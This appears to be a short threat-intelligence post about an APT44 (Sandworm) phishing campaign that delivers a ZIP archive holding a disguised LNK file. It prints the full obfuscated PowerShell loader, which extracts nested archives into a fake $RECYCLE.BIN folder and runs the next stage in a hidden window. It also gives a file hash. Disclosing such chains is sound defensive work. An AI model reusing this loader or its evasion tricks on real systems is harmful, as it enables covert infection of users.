A sophisticated multi-stage infection chain originating from a malicious ZIP archive titled Iskhod_7582_Predstavlenie_na_naznachenie.zip. The campaign, attributed to the Russian state-sponsored group APT44, leverages deceptive file naming and complex PowerShell obfuscation to bypass traditional defenses. The attack begins with a phishing email containing the ZIP archive. Inside, users find what appears to be a PDF document but is actually a Windows Shortcut (LNK) file. The Chain of Infection: Deceptive LNK: The user double-clicks a file disguised with a Microsoft Edge icon. PowerShell Pivot: The LNK executes a command that uses where.exe to find itself on the disk. Hidden Staging: It extracts a hidden stage into the %APPDATA% directory, specifically utilizing a faux $RECYCLE.BIN folder to evade manual inspection. Final Payload: A file named currentSessionTrigger is read and executed in a hidden window, establishing a remote connection to the attacker's infrastructure. Malicious Command Execution The core malicious activity is driven by a complex PowerShell command executed via the LNK file: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $firstSummaryTitle=(where.exe /r $env:USERPROFILE 'Iskhod_7582_Predstavlenie_na_naznachenie.zip') | select -First 1; $totalValueThreshold=$firstSummaryTitle.Trim(); Expand-Archive $totalValueThreshold -D $env:APPDATA\uuidPeriod; $totalValueThreshold=$env:APPDATA '\uuidPeriod\$RECYCLE.BIN\employeeTrigger'; $permanentLicenseRate=$totalValueThreshold '.zip'; ren $totalValueThreshold -N $permanentLicenseRate; Expand-Archive $permanentLicenseRate -D $env:APPDATA\outlook; $mainDataType=gc $env:APPDATA\outlook\currentSessionTrigger; Start-Process -Wi Hidden powershell $mainDataType Hash 2156c270ffe8e4b23b67efed191b9737 #CyberSecurity #APT44 #Sandworm #MalwareAlert #ThreatIntel